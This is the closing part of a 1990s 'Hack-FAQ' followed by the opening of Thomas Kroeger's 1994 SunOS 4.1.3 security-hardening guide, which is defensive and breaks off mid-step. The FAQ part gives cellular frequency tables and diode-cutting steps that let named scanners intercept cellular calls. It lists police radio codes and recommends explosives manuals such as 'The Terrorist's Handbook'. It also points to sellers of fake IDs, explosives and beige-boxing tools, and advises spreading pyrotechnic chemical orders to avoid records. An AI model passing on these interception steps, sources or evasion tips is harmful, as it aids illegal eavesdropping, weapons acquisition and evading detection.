839.430 839.460 839.490 839.520 839.550 839.580 839.610

9 502 503 504 505 506 507 508
885.060 885.090 885.120 885.150 885.180 885.210 885.240
840.060 840.090 840.120 840.150 840.180 840.210 840.240

10 523 524 525 526 527 528 529
885.690 885.720 885.750 885.780 885.810 885.840 885.870
840.690 840.720 840.750 840.780 840.810 840.840 840.870

11 544 545 546 547 548 549 550
886.320 886.350 886.380 886.410 886.440 886.470 886.500
841.320 841.350 841.380 841.410 841.440 841.470 841.500

12 565 566 567 568 569 570 571
886.950 886.980 887.010 887.040 887.070 887.100 887.130
841.950 841.980 842.010 842.040 842.070 842.100 842.130

13 586 587 588 589 590 591 592
887.580 887.610 887.640 887.670 887.700 887.730 887.760
842.580 842.610 842.640 842.670 842.700 842.730 842.760

14 607 608 609 610 611 612 613
888.210 888.240 888.270 888.300 888.330 888.360 888.390
843.210 843.240 843.270 843.300 843.330 843.360 843.390

15 628 629 630 631 632 633 634
888.840 888.870 888.900 888.930 888.960 888.990 889.020
843.840 843.870 843.900 843.930 843.960 843.990 844.020

16 649 650 651 652 653 654 655
889.470 889.500 889.530 889.560 889.590 889.620 889.650
844.470 844.500 844.530 844.560 844.590 844.620 844.650

Cell #
Chan 8 9 10 11 12 13 14

1 341 342 343 344 345 346 347
880.230 880.260 880.290 880.320 880.350 880.380 880.410
835.230 835.260 835.290 835.320 835.350 835.380 835.410

2 362 363 364 365 366 367 368
880.860 880.890 880.920 880.950 880.980 881.010 881.040
835.860 835.890 835.920 835.950 835.980 836.010 836.040

3 383 384 385 386 387 388 389
881.490 881.520 881.550 881.580 881.610 881.640 881.670
836.490 836.520 836.550 836.580 836.610 836.640 836.670

4 404 405 406 407 408 409 410
882.120 882.150 882.180 882.210 882.240 882.270 882.300
837.120 837.150 837.180 837.210 837.240 837.270 837.300

5 425 426 427 428 429 430 431
882.750 882.780 882.810 882.840 882.870 882.900 882.930
837.750 837.780 837.810 837.840 837.870 837.900 837.930

6 446 447 448 449 450 451 452
883.380 883.410 883.440 883.470 883.500 883.530 883.560
838.380 838.410 838.440 838.470 838.500 838.530 838.560

7 467 468 469 470 471 472 473
884.010 884.040 884.070 884.100 884.130 884.160 884.190
839.010 839.040 839.070 839.100 839.130 839.160 839.190

8 488 489 490 491 492 493 494
884.640 884.670 884.700 884.730 884.760 884.790 884.820
839.640 839.670 839.700 839.730 839.760 839.790 839.820

9 509 510 511 512 513 514 515
885.270 885.300 885.330 885.360 885.390 885.420 885.450
840.270 840.300 840.330 840.360 840.390 840.420 840.450

10 530 531 532 533 534 535 536
885.900 885.930 885.960 885.990 886.020 886.050 886.080
840.900 840.930 840.960 840.990 841.020 841.050 841.080

11 551 552 553 554 555 556 557
886.530 886.560 886.590 886.620 886.650 886.680 886.710
841.530 841.560 841.590 841.620 841.650 841.680 841.710

12 572 573 574 575 576 577 578
887.160 887.190 887.220 887.250 887.280 887.310 887.340
842.160 842.190 842.220 842.250 842.280 842.310 842.340

13 593 594 595 596 597 598 599
887.790 887.820 887.850 887.880 887.910 887.940 887.970
842.790 842.820 842.850 842.880 842.910 842.940 842.970

14 614 615 616 617 618 619 620
888.420 888.450 888.480 888.510 888.540 888.570 888.600
843.420 843.450 843.480 843.510 843.540 843.570 843.600

15 635 636 637 638 639 640 641
889.050 889.080 889.110 889.140 889.170 889.200 889.230
844.050 844.080 844.110 844.140 844.170 844.200 844.230

16 656 657 658 659 660 661 662
889.680 889.710 889.740 889.770 889.800 889.830 889.860
844.680 844.710 844.740 844.770 844.800 844.830 844.860

Cell #
Chan 15 16 17 18 19 20 21

1 348 349 350 351 352 353 354
880.440 880.470 880.500 880.530 880.560 880.590 880.620
835.440 835.470 835.500 835.530 835.560 835.590 835.620

2 369 370 371 372 373 374 375
881.070 881.100 881.130 881.160 881.190 881.220 881.250
836.070 836.100 836.130 836.160 836.190 836.220 836.250

3 390 391 392 393 394 395 396
881.700 881.730 881.760 881.790 881.820 881.850 881.880
836.700 836.730 836.760 836.790 836.820 836.850 836.880

4 411 412 413 414 415 416 417
882.330 882.360 882.390 882.420 882.450 882.480 882.510
837.330 837.360 837.390 837.420 837.450 837.480 837.510

5 432 433 434 435 436 437 438
882.960 882.990 883.020 883.050 883.080 883.110 883.140
837.960 837.990 838.020 838.050 838.080 838.110 838.140

6 453 454 455 456 457 458 459
883.590 883.620 883.650 883.680 883.710 883.740 883.770
838.590 838.620 838.650 838.680 838.710 838.740 838.770

7 474 475 476 477 478 479 480
884.220 884.250 884.280 884.310 884.340 884.370 884.400
839.220 839.250 839.280 839.310 839.340 839.370 839.400

8 495 496 497 498 499 500 501
884.850 884.880 884.910 884.940 884.970 885.000 885.030
839.850 839.880 839.910 839.940 839.970 840.000 840.030

9 516 517 518 519 520 521 522
885.480 885.510 885.540 885.570 885.600 885.630 885.660
840.480 840.510 840.540 840.570 840.600 840.630 840.660

10 537 538 539 540 541 542 543
886.110 886.140 886.170 886.200 886.230 886.260 886.290
841.110 841.140 841.170 841.200 841.230 841.260 841.290

11 558 559 560 561 562 563 564
886.740 886.770 886.800 886.830 886.860 886.890 886.920
841.740 841.770 841.800 841.830 841.860 841.890 841.920

12 579 580 581 582 583 584 585
887.370 887.400 887.430 887.460 887.490 887.520 887.550
842.370 842.400 842.430 842.460 842.490 842.520 842.550

13 600 601 602 603 604 605 606
888.000 888.030 888.060 888.090 888.120 888.150 888.180
843.000 843.030 843.060 843.090 843.120 843.150 843.180

14 621 622 623 624 625 626 627
888.630 888.660 888.690 888.720 888.750 888.780 888.810
843.630 843.660 843.690 843.720 843.750 843.780 843.810

15 642 643 644 645 646 647 648
889.260 889.290 889.320 889.350 889.380 889.410 889.440
844.260 844.290 844.320 844.350 844.380 844.410 844.440

16 663 664 665 666
889.890 889.920 889.950 889.980
844.890 844.920 844.950 844.980

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?
1. Buy an older scanner before they stopped them from receiving the
necessary freqs (look at garage sales)
2. For a Realistic PRO-2004 open the case and cut one leg of D-513.
3. For a Realistic PRO-2005 open the case and cut one leg of D-502.
4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
and 869-896 MHz.
5. Get the “Scanner Modification Handbook” volumes I and II by Bill
Cheek from Communications Electronics Inc. (313)996-8888.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?

There are books available at Radio Shack for about $8 that list all
of the freqs used by area.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?

10-00 Series Code

10-0 Exercise great caution.
10-1 Reception is poor.
10-2 Reception is good.
10-3 Stop transmitting.
10-4 Message received.
10-5 Relay message.
10-6 Change channel.
10-7 Out of service/unavailable for assignment.
10-7A Out of service at home.
10-7B Out of service – personal.
10-7OD Out of service – off duty
10-8 In service/available for assignment.
10-9 Repeat last transmission.
10-10 Off duty.
10-10A Off duty at home.
10-11 Identify this frequency.
10-12 Visitors are present (be discreet).
10-13 Advise weather and road conditions.
10-14 Citizen holding suspect.
10-15 Prisoner in custody.
10-16 Pick up prisoner.
10-17 Request for gasoline.
10-18 Equipment exchange.
10-19 Return/returning to the station.
10-20 Location?
10-21 Telephone:______
10-21A Advise home that I will return at ______.
10-21B Phone your home
10-21R Phone radio dispatch
10-22 Disregard the last assignment.
10-22C Leave area if all secure; responsible person/owner is
enroute.
10-23 Standby.
10-24 Request car-to-car transmission.
10-25 Do you have contact with _______?
10-26 Clear.
10-27 Driver’s license check.
10-28 Vehicle registration request.
10-29 Check wants/warrants [vehicle] (PIN,SVS)
10-29a Check wants/warrants [subject] (PIN)
10-29c Check complete [subject]
10-29f The subject is wanted for a felony.
10-29h Caution – severe hazard potential.
10-29r Check wants/record [subject] (PIN,CJIC)
10-29m The subject is wanted for a misdemeanor.
10-29v The vehicle is wanted in connection with a possible crime.
10-30 Does not conform to regulations.
10-32 Drowning.
10-33 Alarm sounding.
10-34 Assist at office.
10-35 Time check.
10-36 Confidential information.
10-37 Identify the operator.
10-39 Can ______ come to the radio?
10-40 Is ______ available for a telephone call?
10-42 Check on the welfare of/at ______.
10-43 Call a doctor.
10-45 What is the condition of the patient?
10-45A Condition of patient is good.
10-45B Condition of patient is serious.
10-45C Condition of patient is critical.
10-45D Patient is deceased.
10-46 Sick person [amb. enroute]
10-48 Ambulance transfer call
10-49 Proceed to/Enroute to ______.
10-50 Subject is under the influence of narcotics./Take a report.
10-51 Subject is drunk.
10-52 Resuscitator is needed.
10-53 Person down.
10-54 Possible dead body.
10-55 This is a coroner’s case.
10-56 Suicide.
10-56A Suicide attempt.
10-57 Firearm discharged.
10-58 Garbage complaint
10-59 Security check./Malicious mischief
10-60 Lock out.
10-61 Miscellaneous public service.
10-62 Meet a citizen.
10-62A Take a report from a citizen.
10-62B Civil standby.
10-63 Prepare to copy.
10-64 Found property.
10-65 Missing person
10-66 Suspicious person.
10-67 Person calling for help.
10-68 Call for police made via telephone.
10-70 Prowler.
10-71 Shooting.
10-72 Knifing.
10-73 How do you receive?
10-79 Bomb threat.
10-80 Explosion.
10-86 Any traffic?
10-87 Meet the officer at ______.
10-88 Fill with the officer/Assume your post.
10-91 Animal.
10-91a Stray.
10-91b Noisy animal.
10-91c Injured animal.
10-91d Dead animal.
10-91e Animal bite.
10-91g Animal pickup.
10-91h Stray horse
10-91j Pickup/collect ______.
10-91L Leash law violation.
10-91V Vicious animal.
10-95 Out of vehicle-pedestrian/ Requesting an I.D./Tech unit.
10-96 Out of vehicle-ped. send backup
10-97 Arrived at the scene.
10-98 Available for assignment.
10-99 Open police garage door
10-100 Civil disturbance – Mutual aid standby.
10-101 Civil disturbance – Mutual aid request.

11-00 Series Code

11-10 Take a report.
11-24 Abandoned automobile.
11-25 Traffic hazard.
11-26 Abandoned bicycle.
11-27 10-27 with the driver being held.
11-28 10-28 with the driver being held.
11-40 Advise if an ambulance is needed.
11-41 An ambulance is needed.
11-42 No ambulance is needed.
11-48 Furnish transportation.
11-51 Escort.
11-52 Funeral detail.
11-54 Suspicious vehicle.
11-55 Officer is being followed by automobile.
11-56 Officer is being followed by auto containing dangerous
persons.
11-57 An unidentified auto appeared at the scene of the assignment.
11-58 Radio traffic is being monitored. Phone all non-routine
messages.
11-59 Give intensive attention to high hazard/business areas.
11-60 Attack in a high hazard area.
11-65 Signal light is out.
11-66 Defective traffic light.
11-78 Aircraft accident.
11-79 Accident – ambulance has been sent.
11-80 Accident – major injuries.
11-81 Accident – minor injuries.
11-82 Accident – no injuries.
11-83 Accident – no details.
11-84 Direct traffic.
11-85 Tow truck required.
11-94 Pedestrian stop.
11-95 Routine traffic stop.
11-96 Checking a suspicious vehicle.
11-97 Time/security check on patrol vehicles.
11-98 Meet: _______
11-99 Officer needs help.

900 Series Codes

904 Fire.
904A Automobile fire.
904B Building fire.
904G Grass fire.
909 Traffic problem; police needed.
910 Can handle this detail.
932 Turn on _______ mobile relay at _______.
933 Turn off mobile relay.
949 Burning inspection at _______.
950 Control burn in progress/about to begin/ended.
951 Need fire investigator.
952 Report on conditions.
953 Investigate smoke.
953A Investigate gas.
954 Off the air at the scene of the fire.
955 Fire is under control.
956 Assignment not finished.
957 Delayed response of __ minutes.
980 Restrict calls to emergency only.
981 Resume normal traffic.
1000 Plane crash
3000 Road block

Other Codes

Code 1 Do so at your convenience.
Code 2 Urgent.
Code 3 Emergency/lights and siren.
Code 4 No further assistance is needed.
Code 5 Stakeout.
Code 6 Responding from a long distance.
Code 7 Mealtime.
Code 8 Request cover/backup.
Code 9 Set up a roadblock.
Code 10 Bomb threat
Code 12 Notify news media
Code 20 Officer needs assistance
Code 22 Restricted radio traffic
Code 30 Officer needs HELP – EMERGENCY!
Code 33 Mobile emergency – clear this radio channel.
Code 43 TAC forces committed.
AID Public Safety Assistance

Phonetic Alphabet

A Adam N Nora
B Boy O Ocean
C Charles P Paul
D David Q Queen
E Edward R Robert
F Frank S Sam
G George T Tom
H Henry U Union
I Ida V Victor
J John W William
K King X X-ray
L Lincoln Y Yellow
M Mary Z Zebra

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?

Vehicles

Item Example

1. Color Red over black
2. Year 1984
3. Make Cadillac
4. Body Two door
5. License plate 6VWH926 (given phonetically!)

Persons
1. Name
2. Race
3. Sex
4. Age
5. Height
6. Weight
7. Hair color
8. Eye color
9. Complexion
10. Physical marks, tattoos, scars, limps, etc.
11. Clothing (head to feet)
a. Hat
b. Shirt;tie
c. Coat
d. Trousers
e. Socks
f. Shoes

=====================================================================
Appendix A. FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.

=====================================================================
Appendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip

Also try IRC #hack. *** WARNING: May be lame at times!!! ***

=====================================================================
Appendix D. Publications and Zines

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600:The Hacker Quarterly

a technical journal put out by hackers

mail: email:
2600 2600@well.sf.ca.us
PO Box 752 emmanuel@well.sf.ca.us
Middle Island, NY 11953
PH:516-751-2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK

The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED

The magazine of the cyberculture.

Email: subscription@wired.com
info@wired.com

Or look for it on many newsstands.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fringe Ware Review

Email: fringeware@io.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Iron Feather Journal

Mail:
IFJ
PO Box 1905
Boulder CO 80306

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Groom Lake Desert Rat

Email: psychospy@aol.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Cybertek: The Cyberpunk Technical Journal

Mail:
Cybertek
PO Box 64
Brewster NY 10509

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

LineNoiz

Email: dodger@fubar.bk.psu.edu
with
‘subscription linenoiz’
in the body of the message

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For more info on zines, check out Factsheet Five and
Factsheet Five Electronic.

email: jerod23@well.sf.ca.us

=====================================================================
Appendix E. Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.

Davis, Tenney L.: “Chemistry of Powder and Explosives.”

Hogan, Thom: “The Programmer’s PC Sourcebook” (Microsoft Press)

Russell: “Computer Security Basics”

Cornwall: “The (New) Hacker’s Handbook”

“Cyberpunk” (forget the authors)

Kochan & Wood: “UNIX System Security”

Spafford & Garfinkel: “Practical UNIX Security”

Stoll, Clifford: “The Cuckoo’s Egg”

Gasser, Morrie: “Building a Secure Computer System”

THE RAINBOW SERIES
Can be obtained free from:
INFOSEC Awareness Office
National Computer Security Centre
9800 Savage Road
Fort George G. Meade, MD 20755-6000
Tel: 1-301-766-8729

“The Improvised Munitions Manual”

=====================================================================
Appendix F. Files and Papers.

Morris & Thompson: “Password Security, A Case History”

Curry: “Improving the Security of your UNIX System”
available via FTP as ‘security-doc.tar.Z’

Klein: “Foiling the Cracker: A Survey of, and Improvements to,
Password Security.”
Archie search for ‘Foiling’

Cheswick: “The Design of a Secure Internet Gateway”
available from research.att.com
/dist/Secure_Internet_Gateway.ps

Cheswick: “An Evening with Berford: in which a Cracker is Lured,
Endured and Studied”
available from research.att.com
/dist/berford.ps

Bellovin89: “Security Problems in the TCP/IP Protocol Suite”
available from research.att.com
/dist/ipext.ps.Z

Bellovin91: “Limitations of the Kerberos Authentication System”
available from research.att.com

CERT: many various bits of info collected at cert.sei.cmu.edu

“Open Systems Security”
available from ajk.tele.fi(131.177.5.20)
/PublicDocuments

RFC-1244: “The Site Security Handbook”

“The Terrorist’s Handbook”
how to make various explosive, propellants and
ignitors and also how to apply and use them

=====================================================================
Appendix G. Catalogs

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lockpicks
(from Belisarius)

You can get lockpicks from:

American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062

Lock Pick Sets
==============
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.

Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches, extractor. Hand finished leather case.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Explosives and other underground stuff

Loompanics is one of the major distributors of material relating to
the underground including explosives. You can get the catalog by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)

NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Weapons, explosives, survival gear.
(from CyberSorceror)

Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you’d ever have time to read.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Paladin Press
PO Box 1307
Boulder, CO 80306

Enclose $2 for the publishers of the “Action Library”.
Books on lockpicking, wiretapping, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)

Their Customer Service Number is as follows:
1-800-333-5102
Their Hours are:
9am-9pm, Monday-Friday

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For beige boxing, data com cracking/patching tools try:
TIME MOTION TOOLS
12778 BROOKPRINTER PLACE
POWAY, CA 92064-6810

(619) 679-0303
(800) 779-8170

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)

Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220

Send a crisp $1 bill and a request for a catalog. Tip: Don’t order
all your pyro stuff from here. They DO keep records. Be safe.

=====================================================================
Appendix H. PGP keys

None available currently …

=====================================================================

*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy’s plans and you will know ******
***** which strategy will be successful and which will not. ******
***** — Sun Tzu, The Art of War ******
*********************************************************************
*********************************************************************

How to improve security on a newly installed SunOS 4.1.3 system. by Thomas M. Kroeger (July 1994)

From tmk@uhunix.uhcc.Hawaii.Edu Thu Jun 30 08:54:17 EDT 1994
Subject: How to improve security on a newly installed SunOS 4.1.3 system.
Summary: How to improve security on a newly installed SunOS 4.1.3 system.
X-Newsreader: TIN [version 1.2 PL2]
Date: Thu, 30 Jun 1994 09:39:10 GMT

My apologies for taking so long with this; it became much larger than
I’d thought it would.
Please Note:
1) My intent in this was to limit my audience enough so that
this document would not become too large and cumbersome.
Please note the intended audience.
2) This document is sure to undergo revision, and I hesitate to
ever call any revision a final draft.
3) Please forgive any typos and grammatical errors. It’s late
and I wanted to get this out on a day other than Friday.
Send me notes of typos and spelling directly; don’t bother
the rest of the net with such.
4) I’ll try to post when I’m able to put this list up on our
ftp server ftp.Hawaii.Edu:/pub/security.

Again many thanks to all those who provided feedback.

I’m not sure where the other lists are but here’s what I’ve got,
please let me know if it’s of help:

———————————————————————-

How to improve security on a newly installed SunOS 4.1.3 system.

Version 1.0..Thomas M. Kroeger – July 94
….tmk@hawaii.edu

Copyright — Thomas M. Kroeger – July 94
Please feel free to redistribute or include this list or parts of it
wherever you desire, but, please include appropriate citation.

Goal –
Attempt to provide a list of some of the more basic steps that
can be done to improve security on a newly installed SunOS 4.1.3 system.
This is by no means an all inclusive list of actions, just a list of
some simple and more common measures.

Intended Audience –
Anyone responsible for the system administration duties of a machine
running SunOS 4.1.3. These recommendations are applicable to a stand-alone *
workstation. It is assumed that the reader has some familiarity with basic
system administration (you should be able to do a basic system installation
by yourself, install patches, and use an editor).

[* which may be connected to a larger network?]

NOTE: This list limits its coverage to measures that can
be done for a stand-alone workstation. In addition to the steps listed here
there are many measures that can be taken to improve the security of
an environment, measures such as filtering traffic to port 2049/udp
at the routers, which will prevent NFS calls from outside your domain.

Disclaimer —
These recommendations come with no guarantees of anything! Support is only
offered within the University of Hawai’i community.

The truly paranoid may wish to implement these recommendations while in
single user mode as an extra measure of security to avoid possible subversive
shenanigans by a wily cracker.

To Do on a system Just installed
——————————

Patches —
+ install the following patches

4.1.3 Security listing
100103 SunOS 4.1;4.1.1;4.1.2;4.1.3: script to change file permissions
100173 SunOS 4.1.1/4.1.2/4.1.3 : NFS Jumbo Patch
* 100224 SunOS 4.1.1,4.1.2,4.1.3: /bin/mail jumbo patch
100257 SunOS 4.1.1;4.1.2;4.1.3: jumbo patch for ld.so, ldd, and ldconf
100272 SunOS 4.1.3: Security update for in.comsat.
100296 SunOS 4.1.1, 4.1.2, 4.1.3: netgroup exports to world
100305 SunOS 4.1.1, 4.1.2, 4.1.3: lpr Jumbo Patch
100372 SunOS 4.1.1;4.1.2;4.1.3: tfs and c2 do not work together
* 100377 SunOS 4.1.1, 4.1.2, 4.1.3: sendmail jumbo patch
* 100383 SunOS 4.0.3;4.1;4.1.1;4.1.2;4.1.3: rdist security and hard link
100448 OpenWindows 3.0: loadmodule is a security hole.
100452 OpenWindows 3.0: XView 3.0 Jumbo Patch
100478 OpenWindows 3.0: xlock crashes leaving system open
* 100482 SunOS 4.1;4.1.1;4.1.2;4.1.3: ypserv and ypxfrd fix, plus DNS fi
100507 SunOS 4.1.1, 4.1.2, 4.1.3: tmpfs jumbo patch
100513 SunOS 4.1.1;4.1.2;4.1.3: Jumbo tty patch
100564 SunOS 4.1.2, 4.1.3: C2 Jumbo patch
* 100593 SunOS 4.1.3: Security update for dump.
100623 SunOS 4.1.2;4.1.3: UFS jumbo patch
100630 SunOS 4.1.1, 4.1.2, 4.1.3: SECURITY: methods to exploit login/su
100631 SunOS 4.1.x: env variables can be used to exploit login(US only)
* 100632 SunSHIELD 1.0: ARM jumbo patch release
100890 SunOS 4.1.3: domestic libc jumbo patch
100891 SunOS 4.1.3: international libc jumbo patch
100909 SunOS 4.1.1;4.1.2;4.1.3: Security update for syslogd.
101072 SunOS 4.1.1;4.1.2;4.1.3: Non-related data filled the last block
101080 SunOS 4.1.1 4.1.2 4.1.3: security problem with expreserve
101200 SunOS 4.1.1, 4.1.2, 4.1.3: Breach of security using modload
101206 ODS 1.0; NFS/fsirand security fix.
* 101480 SunOS 4.1.1;4.1.2;4.1.3: Security update for in.talkd.
* 101482 SunOS 4.1.3, 4.1.2, 4.1.1: Security update for write.
101640 SunOS 4.1.3: in.ftpd logs password info when -d option is used.
101710 ONLINE DISKSUITE (ODS) 1.0: Security update for dump.

4.1.3 U1 security listing
101434 SunOS 4.1.3_U1: lpr Jumbo Patch
* 101435 SunOS 4.1.3_U1: ypserv fix
* 101436 SunOS 4.1.3_U1: bin/mail jumbo patch
101440 SunOS 4.1.3_U1: security problem: methods to exploit login/su
101558 SunOS 4.1.3_U1: international libc jumbo patch
* 101579 SunOS 4.1.3_U1: Security problem with expreserve for Solaris 1.
101587 SunOS 4.1.3_U1: security patch for mfree and icmp redirect
101590 ONLINE DISKSUITE (ODS) 1.0, NFS/fsirand security fix
101621 SunOS 4.1.3_U1: Jumbo tty patch
* 101665 SunOS 4.1.3_U1: sendmail jumbo patch
101679 SunOS 4.1.3_U1: Breach of security using modload
101759 SunOS 4.1.3_U1: domestic libc jumbo patch

* – Note: some patches may not be required if you are disabling this
feature. If this is the case, ensure that all relevant files have had
their mode changed to remove the SUID bit — chmod u-s .

Note 2: Some patches may not necessarily apply based on packages
installed (US Encryption…) or your configuration. Please carefully
check the README for each patch.
Patches are available via anonymous ftp from
ftp.uu.net:/system/sun/sun-dist

Network level changes ——-

+ Disable source routing
Why:
Source routing enables the originating host to dictate the route the
packet will take. This can be used to spoof a system into believing
that the packets are coming from a trusted source.
How:
Install patch found in Ref. 19
More info: Ref. 2 [Cheswick 94] Chap 2, Ref. 19

+ Comment out all unnecessary services in /etc/inetd.conf
Why:
RPC services can be used to gain access as well as information about
a system. These are very site specific adjustments and will have to
be tailored to your needs. Additionally, TCP wrappers [Ref. 4] can be
used to improve logging, prevent IP spoofing (one host pretending to be
another to gain access) and limit access to a service as well as
totally removing it.
How:
Edit file /etc/inetd.conf and put a # in front of services that
are not needed.

Services possibly needed, but probably desired:
ftp – possibly needed for file transfer, however if all you
want is outgoing ftp then this can be commented out.
telnet – obvious (recommend restricting with TCP wrappers Ref. 4)
finger – Possibly but better to get a modified version that doesn’t
give up that much information (To be honest I have no
experience with any of these; I’d recommend checking into
some of the ones on ftp.uu.net).
talk – nice to have but how much will you miss it?

Services which are probably unnecessary – see man pages for details
name – for name services (man tnamed)
comsat – for mail – not necessary.
login – for rlogin – please see discussion under ruserok().
uucp – if you aren’t sure if you’re using this then you are not.
exec – services for rexecd – do without.

Services recommended against – FIND A WAY TO LIVE WITHOUT.
shell – for rsh — major source for security problems
tftp – only needed for support of an X terminal or diskless
clients, doubtfully needed on a desktop machine.
More info: Ref. 4 [Venema 92]., Ref. 15

+ Enable NFS port monitoring (This is of value only if you are exporting
filesystems over NFS)
Why:
Port monitoring ensures that calls to NFS to mount a file system come
from a port < 1024 (in other words, a port that requires root access to use).
How:
The default /etc/rc.local sets up port monitoring only if the file
/etc/security/passwd.adjunct exists. If you will be implementing shadowing
then you can skip over this step. If you will not be implementing shadowing
and you will be exporting files then you should modify /etc/rc.local to do
the following 2 lines (regardless of whether the passwd.adjunct file exists):
echo "nfs_portmon/W1" | adb -w /vmunix /dev/kmem > /dev/null 2>&1
rpc.mountd

Shadowing is covered under the section Changes to ID Management.

Note: one possible side effect: non-sun nfs client might not
be able to mount exported files.
More info: Ref. 3 [Stern 92] pg 177 & mountd(8C)

+ Ensure that ypbind is started with the -s option.
Why:
Users could easily start their own ypbind services and activate a
phony NIS database giving them access as any user.
How:
As with port monitoring the default /etc/rc.local sets up ypbind in the
secure mode (-s option) only if the file /etc/security/passwd.adjunct
exists. If you will be implementing shadowing then you can skip over
this step, otherwise you should modify /etc/rc.local to start ypbind
with the -s option regardless of whether the passwd.adjunct file exists.
More info: ypbind(8)

+ Disable IP forwarding –
Why:
I’m not sure if this can be abused on a machine with only one interface
but I’d rather err on the side of safety. It could be used to spoof
an IP address.
How:
Install the following line in the kernel configuration file:
